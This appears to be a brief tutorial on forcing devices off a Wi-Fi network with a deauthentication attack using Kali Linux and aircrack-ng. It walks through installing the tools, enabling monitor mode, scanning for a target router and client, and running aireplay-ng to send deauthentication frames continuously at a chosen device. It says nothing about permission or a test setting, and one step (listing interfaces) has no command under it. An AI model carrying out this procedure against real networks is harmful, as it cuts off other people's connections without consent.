Wi-fi deauthentication attack using Kali-Linux

Forcing a device to disconnect from Wi-Fi using a deauthentication attack.

Deauthentication attack use a deauthentication frame.This frame sent from a router to a device so it forces the device to disconnect from the network.

Basic idea of how it works :

Now lets begin the attack .

First if you have installed Kali on virtual machine you need a wifi adapter. 

Install aircrack-ng :

sudo apt install aircrack-ng

List all wifi interfaces :


In this case my adapter is shown as wlan0

Put adapter in monitor mode :

airmon-ng start wlan0

Now my adapter is wlan0mon because its in monitor mode.

Find all wifi routers and devices :

airodump-ng wlan0mon

Get target wifi router's bssid (mac address)

Find devices only on target wifi network :

airodump-ng wlan0mon --bssid [routers BSSID here]--channel [routers channel here]

After that we find the bssid of the device we want to attack(kick)

Initiate Attack  :

aireplay-ng --deauth 0 -c [DEVICES MAC ADDRESS] -a [ROUTERS MAC ADDRESS] wlan0mon

This will send deauthentication frames to the device continuously and disconnect the device from the network.


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